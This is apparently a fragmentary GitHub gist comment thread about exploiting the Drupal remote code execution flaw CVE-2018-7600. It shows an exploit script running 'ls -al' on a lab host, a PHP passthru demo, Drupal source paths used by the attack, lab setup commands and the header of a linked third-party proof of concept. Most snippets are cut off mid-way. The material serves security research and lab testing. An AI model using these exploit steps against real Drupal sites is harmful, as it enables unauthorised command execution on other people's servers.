nixawk

print os command output directly. ``` $ py3 exploit-CVE-2018-7600.py http://192.168.1.19 "ls -al" total 276 drwxr-xr-x 9 root root 4096 Apr 14 05:38 . drwxr-xr-x 3 root root 4096 Apr 13...


``` ---->> Filename: /path/to/drupal/core/lib/Drupal/Core/Render/Renderer.php ---->> Function: doRender() // Filter the outputted content and make any last changes before the content // is sent to the browser. The changes are made...

``` ---->> Filename: core/lib/Drupal/Core/Controller/ControllerResolver.php ---->> Function: getControllerFromDefinition ``` ## passthru ``` public function getControllerFromDefinition($controller, $path = '') { if (is_array($controller) || (is_object($controller) && method_exists($controller, '__invoke'))) { return $controller; } if...

A php demo is prepared for exp tests. It shows how to exploit [CVE-2018-7600](https://research.checkpoint.com/uncovering-drupalgeddon-2/). ``` root@lab:~# php /tmp/bug.php passthru id PHP Warning: Parameter 2 to passthru() expected to be a...

``` apt-get update apt-get install apache2 php apt-get install mariadb-server-10.1 mariadb-client-10.1 apt-get install php-mysql php-gd php-xml php-xdebug ``` ``` # apache2 --version [Sat Apr 14 10:02:10.979265 2018] [core:warn] [pid 10482]...

@antonio-fr The exploit tests against drupal 8.4.5. If [**passthru**](http://php.net/manual/en/function.passthru.php) should be used in place of exec() or system() when the ***output from the Unix command is binary data which needs...

@dbjpanda Please try [FireFart's Poc](https://github.com/FireFart/CVE-2018-7600) for 7.x. ``` #!/usr/bin/env python3 """ Written by Christian Mehlmauer https://firefart.at/ https://twitter.com/_FireFart_ https://github.com/FireFart This script can be obtained from: https://github.com/FireFart/CVE-2018-7600 Requirements: - python3 - python...

Good job !

@alfonsocaponi Could you share your packets here ? A pcap may be useful.